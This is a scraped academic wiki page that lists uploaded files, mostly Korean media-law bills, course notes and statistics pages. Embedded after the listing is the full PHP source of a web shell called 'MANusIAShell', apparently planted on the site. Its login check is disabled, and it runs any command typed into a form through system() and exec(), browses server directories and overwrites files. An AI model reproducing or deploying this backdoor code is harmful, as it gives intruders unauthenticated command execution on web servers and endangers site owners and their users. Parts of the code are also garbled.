[[UploadFile]]Macro

[[UploadedFiles]]Macro

File nameSizeDate
002_20100120/ 2012-05-08
1800249신문등의자유와기능보장에관한법률일부개정법률안/ 2012-05-08
1800556신문등의자유와기능보장에관한법률일부개정법률안/ 2012-05-08
1800629방송법일부개정법률안/ 2012-05-08
1801079정보통신망이용촉진및정보보호등에관한법률일부개정법률안/ 2012-05-08
1801671정보통신망이용촉진및정보보호등에관한법률일부개정법률안/ 2012-05-08
1801683정보통신망이용촉진및정보보호등에관한법률일부개정법률안/ 2012-05-08
1801818정보통신망이용촉진및정보보호등에관한법률일부개정법률안/ 2012-05-08
1802408정보통신망이용촉진및정보보호등에관한법률일부개정법률안/ 2012-05-08
1802848신문등의자유와기능보장에관한법률일부개정법률안/ 2012-05-08
1803199방송법개정법률안/ 2012-05-08
AgendaSettingTheory/ 2014-04-16
AjouUniversityLibrary/ 2012-05-08
AjouWebResearchquestionnaire2/ 2012-05-08
AlumniDivisionOfDigitalMediaAtAjouUniversity/ 2012-05-08
AlumniDivisionOfDigitalMediaAtAjouUniversityThis/ 2012-05-08
AnalyzingSocialNetworks_Borgatti/ 2020-04-10
BasicCinematicTechniques/ 2012-05-08
BroadcastAdvertisement/ 2014-11-06
BuildingRecommendationSystem/ 2013-10-24
CameraTechniques/ 2012-05-08
CollectiveIntelligenceProject/ 2012-06-04
CompositionTechniques/ 2012-05-08
Correlation/ 2012-05-08
CreativePlan/ 2014-04-03
DangerousEffectsAnimation/ 2012-05-08
DataScienceConference/ 2013-05-13
DeductionAndInduction/ 2012-05-08
DougEngelbart/ 2012-05-08
DrawMacro/ 2012-05-08
F-DistributionTable/ 2020-09-04
FormsAndTemplates/ 2012-05-08
FrontPage/ 2012-05-08
GoogleTv/ 2012-05-08
Hellboy/ 2012-05-08
HistoryOfCommunicationResearch/ 2012-05-08
HistoryOfMassMedia/ 2012-05-08
Homoscedasticity/ 2012-05-08
ITVServiceDevelopment/ 2012-05-08
Imdb/ 2012-05-08
InternetHistory/ 2013-03-25
IptvNotes/ 2012-05-08
LBS/ 2012-05-08
LaTeX/ 2012-05-08
LinusTorvalds/ 2012-05-08
Materials/ 2012-05-08
Maya6KillerTips/ 2012-05-08
Me2DayProject/ 2012-05-08
Me2DayProject2/ 2012-05-08
Microblogging/ 2012-05-08
MovieStudy/ 2014-10-18
Music~KwangSeokKim/ 2020-09-18
Music~김종률/ 2020-09-08
NetworkNeutrality/ 2012-05-08
OnLineMediaAndTheirUse/ 2012-05-08
OnLineMediaAndTheirUse/Presentation/ 2020-09-15
OnlineMediaAndUse/ 2012-05-08
OrsonWelles/ 2012-05-08
PhotoPot/ 2012-05-08
ProjectGutenberg/ 2012-05-08
Project~CastingDigitalCharacter/ 2012-05-08
Project~FrontPage/ 2012-05-08
Project~Nrf2010/LBS~Application/ 2012-05-08
Project~Nrf2010/사회학적접근/ 2020-10-31
Project~한국양방향방송통신콘텐츠산업/ 2012-05-08
QstackerUserTest/ 2012-11-11
RegressionWithCategoricalVariables/ 2012-05-08
ResearchMethods/0902/ 2012-05-08
ResearchMethods/Assignments/billiding/ 2012-05-08
ResearchMethods/Assignments/hkimscil/ 2012-05-08
ResearchMethods/SogangUnivLibrary/ 2012-05-08
ResearchMethods/StandardDeviation/ 2012-05-08
ResearchMethods/Syllabus/ 2012-05-08
ResearchMethods/Variables/ 2012-05-08
ScienceAsVocation/ 2012-05-08
ScienceCommunicationProejct/Survey/ 2012-05-08
SpeechAtKfda/ 2012-05-08
SpiralOfSilence/ 2014-06-11
TechniquesOfPespective/ 2012-05-08
TechnologyAcceptanceModel/ 2014-02-23
Television/ 2012-05-08
UseOfOnlineMedia/ 2012-05-08
Usenet/ 2012-05-08
Variance/ 2012-05-08
VimProcessor/ 2012-05-08
WhyFreeSoftwareIsBetterThanOpenSource/ 2012-05-08
YahooFireEagle/ 2012-05-08
YeonJunChoo/ 2012-05-08
Zscore/ 2012-05-08
Ztable/ 2012-05-08
Ztest/ 2012-05-08
hkim/ 2012-05-08
hkim/notes/ 2012-05-08
magnolia/ 2012-05-08
rm06FallSC/ 2012-05-08
t-test/ 2012-05-08
위치기반서비스시장동향및표준화현황/ 2020-09-04
학술지원/ 2012-05-08
attachment:/crime.savcrime.sav3.91 KB2012-05-08
attachment:/elemapi2.savelemapi2.sav28.49 KB2012-05-08
Total 100 filesNext page »

Password:


See UploadFile

<php
/*
*/

#$selfSecure enables built-in authenticate feature. This must be 0 in order to
#use .htaccess file or other alternative method to control access to MyShell.
#Set up your user and password using $shellUser and $shellPswd.
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
#ACCESS TO THE SCRIPT.

$selfSecure = 0;
$shellUser = "manusia";
$shellPswd = "qwer1234";

#$adminEmail is the email address to send warning notifications in case
#someone tries to access the script and fails to provide correct user and
#password. This only works if you have $selfSecure enabeled.

$adminEmail = "manusia@hackermail.com";

#$fromEmail is the email address warning messages are sended from.
#This defaults to the server admin, but you can change
#to any address you want i.e.: noreplay@yourdomain.com
#This only works if you have $selfSecure enabeled.

$fromEmail = $HTTP_SERVER_VARSSERVER_ADMIN;

#$dirLimit is the top directory allowed to change when using cd command
#or the form selector. Any attempt to change to a directory up to this
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
#It is a good practice to set it to $DOCUMENT_ROOT using:
#$dirLimit = $DOCUMENT_ROOT;
#If you want to have access to all server directories leave it blank.
#WARNING: Althought a user won't be able to snoop on directories above
#this level using MyShell, he/she will still be able to excecute
#commands on any directory where Webserver has permission,
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.

$dirLimit = "";

#$autoErrorTrap Enable automatic error traping if command returns error.
#Bear in mind that MyShell executes the command a second time in order to
#trap the stderr. This shouldn't be a problem in most cases.
#If you turn it off, you'll have to select either to trap stderr or not for
#every command you excecute.

$autoErrorTrap = 1;

#$voidCommands is the list of commands that MyShell won't run by any means.
#It defaults to known problematic commands from a web interface like pico,
#top, xterm but also it can include specific commands you don't want to
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.

$voidCommands = array("top","xterm","su","vi","pico","netscape");

#$TexEd Built-in Text Editor prefered name. This is the command you'll use
#to invoke MyShell's built in text editor.
# If you are used to type pico or vi for your fav text editor,
#change this to your please. i.e.:
# $TexEd = "pico";
#will allow you to type 'pico config.php' to edit the file config.php
#MyShell's text editor do not support usual commands in pico, vi etc.
#Don't forget to take off this command from the $voidCommands list
$TexEd = "edit";

#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
#is usefull when you have to edit files with long lines, i.e.: in php code
#files, because otherwise it is no easy to distinguish a real new line (CR)
#from a wraped one. If you prefer to stick to the default wraped mode of
#TEXTAREA just leave this blank i.e.: $editWrap="".
$editWrap ="wrap='OFF'";

#Cosmetic defaults.

$termCols = 80; //Default width of the output text area
$termRows = 20; //Default heght of the output text area
$bgColor = "#000000"; //background color
$bgInputColor = "#333333"; //color of the input field
$outColor = "#00BB00"; //color of the text output from the server
$textColor = "#009900"; //color of the hard texts of the terminal
$linkColor = "#00FF00"; //color of the links

/************** No customize needed from this point *************/

$MyShellVersion = "MANusIAShell 1.1.0";
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
if($selfSecure){
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
Header('WWW-Authenticate: Basic realm="MyShell"');
Header('HTTP/1.0 401 Unauthorized');
echo "<html>
<head>
<title>$MyShellVersion - Access Denied</title>
</head>
<h1>Access denied</h1>
A warning message have been sended to the administrator
<hr>
<em>$MyShellVersion</em>";
if(isset($PHP_AUTH_USER)){
$warnMsg ="
This is $MyShellVersion
installed on: http://".$HTTP_SERVER_VARSHTTP_HOST."$PHP_SELF
just to let you know that somebody tryed to access
the script using wrong username or password:

Date: ".date("Y-m-d H:i:s")."
IP: ".$HTTP_SERVER_VARSREMOTE_ADDR."
User Agent: ".$HTTP_SERVER_VARSHTTP_USER_AGENT."
username used: $PHP_AUTH_USER
password used: $PHP_AUTH_PW

If this is not the first time it happens,
please consider either to remove MyShell
from your system or change it's name or
directory location on your server.

Regards
MANusIA
";
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
}
exit;
}
}
//Function that validate directories
function validate_dir($dir){
GLOBAL $dirLimit;
if($dirLimit){
$cdPos = strpos($dir,$dirLimit);
if ((string)$cdPos == "") {
$dir = $dirLimit;
$GLOBALSshellOutput = "You are not allowed change to directories above $dirLimit\n";
}
}
return $dir;
}

// Set working directory.
if (isset($work_dir)) {
//A workdir has been asked for - we chdir to that dir.
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
$work_dir = exec("pwd");
}
else{
// No work_dir - we chdir to $DOCUMENT_ROOT
$work_dir = validate_dir($DOCUMENT_ROOT);
chdir($work_dir);
$work_dir = exec("pwd");
}

//Now we handle files if we are in Edit Mode
if($editMode && ($command||$editCancel))$editMode=false;
if($editMode){
if($editSave ||$editSaveExit){
if(function_exists(ini_set))ini_set("track_errors","1");
if($fp=@fopen($file,"w")){
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
fputs($fp,$shellOut);
fclose($fp);
$command = $TexEd." ".$file;
if($editSaveExit) {
$command="";
$shellOutput="MyShell: $file: saved";
$editMode=false;
}
}
else {
$command="";
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
$errorSave=true;
}
}
}

//Separate command(s) and arguments to analize first command
$input=explode(" ",$command);

while (list ($key, $val) = each ($voidCommands)) {
if($input0==$val){
$voidCmd = $input0;
$input0="void";
}
}
switch($input0){
case "cd":
$path=$input1;
if ($path==".."){
$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
if ($work_dir == "") $work_dir = "/";
}
elseif (substr($path,0,1)=="/")$work_dir=$path;
else $work_dir=$work_dir."/".$path;
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
$work_dir = exec("pwd");
$commandBk = $command;
$command = "";
break;
case "man":
exec($command,$man);
if($man){
$codes = ".".chr(8);
$manual = implode("\n",$man);
$shellOutput = ereg_replace($codes,"",$manual);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "cat":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "more":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case $TexEd:
if(file_exists($input1)){
exec("cat ".$input1,$cat);
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$fileOwner = posix_getpwuid(fileowner($input1));
$filePerms = sprintf("%o", (fileperms($input1)) & 0777);
$fileEditInfo = " ::::::: Owner: <font color=$linkColor>".$fileOwnername."</font> Permissions: <font color=$linkColor>$filePerms</font>";
}
else $fileEditInfo = " ::::::: <font color=$linkColor>NEW FILE</font>";
$currFile = $input1;
$editMode = true;
$command = "";
break;
case "void":
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
$commandBk = $command;
$command = "";
}

//Now we prepare the webpage
if(!$oCols)$oCols=$termCols;
if(!$oRows)$oRows=$termRows;
if($editMode)$focus="shellOut.focus()";
else $focus="command.select()";
//WhoamI
if(!$whoami)$whoami=exec("whoami");
?>
<html>
<head>
<title><echo $MyShellVersion?></title>
<style>
body{
background-color: <echo $bgColor ?>;
font-family : sans-serif;
font-size : 10px;
scrollbar-face-color: #666666;
scrollbar-shadow-color: <echo $bgColor ?>;
scrollbar-highlight-color: #999999;
scrollbar-3dlight-color: <echo $bgColor ?>;
scrollbar-darkshadow-color: <echo $bgColor ?>;
scrollbar-track-color: <echo $bgInputColor ?>;
scrollbar-arrow-color: <echo $textColor ?>;
}
input,select,option{
background-color: <echo $bgInputColor ?>;
color : <echo $outColor ?>;
border-style : none;
font-size : 10px;
}
textarea{
background-color: <echo $bgColor ?>;
color : <echo $outColor ?>;
border-style : none;
}
</style>
</head>
<body <echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
<form name="shell" method="post">
Current User: <a href="#" style="text-decoration:none"><echo $whoami?></a>
<input type="hidden" name=whoami value=<echo $whoami?>>
:::::::
<?
if($editMode){
echo "<font color=$linkColor><b>MyShell file editor</font> File:&lt;font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
}
else{
echo "Current working directory: <b>\n";
$work_dir_splitted = explode("/", substr($work_dir, 1));
echo "<a href=\"$PHP_SELFwork_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($work_dir_splitted0 == "") {
$work_dir = "/"; /* Root directory. */
}
else{
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$url .= "/".$work_dir_splitted$i;
echo "<a href=\"$PHP_SELFwork_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted$i</a>/</b>";
}
}
}
?>
<br>
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
<?
echo $shellOutput;
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
else {
$ok = system($command,$status);
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
}
if ($commandBk) $command = $commandBk;
?>
</textarea>
<br>
<?
if($editMode) echo"

<input type='submit' name='editSave' value=' Save '>
<input type='submit' name='editSaveExit' value=' Save and Exit '>
<input type='reset' value=' Restore original '>
<input type='submit' name='editCancel' value=' Cancel/Exit '>
<input type='hidden' name='editMode' value='true'>
<br>";
?>
<br>
Command:
<input type="text" name="command" size="80"
<? if ($command && $echoCommand) {
echo "value=$command";
}
?> > <input name="submit_btn" type="submit" value="Go!">

<?
if ($autoErrorTrap) echo "Auto error traping enabled";
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";

if($editMode){
echo "<input type='hidden' name='work_dir' value='$work_dir'>
<br>Save file as: <input type='text' name='file' value='$currFile'>";
}
else{
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
// List of directories.
$dir_handle = opendir($work_dir);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".")
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
elseif ($dir == "..") {
// Parent Dir. This might be server's root directory
if (strlen($work_dir) == 1) {
// work_dir is only 1 charecter - it can only be / so don't output anything
}
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
echo "<option value=\"/\">Parent Directory</option>\n";
}
else { // String-manipulation to find the parent directory... Trust me - it works :-)
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
}
else {
if ($work_dir == "/")
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
else
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
closedir($dir_handle);
echo "</select>";
}
?>
| <input type="checkbox" name="echoCommand"<if($echoCommand)echo " checked"?>>Echo commands
| Cols:&lt;input type="text" name="oCols" size=3 value=<echo $oCols?>>
Rows:&lt;input type="text" name="oRows" size=2 value=<echo $oRows?>>
| :::::::::: <b>MANusIA</b> ©2004 </a>
</form>
</body>
</html> -- test.php 2004-12-17
Retrieved from http://wiki.commres.org//UploadedFiles
last modified 2012-05-08 14:46:56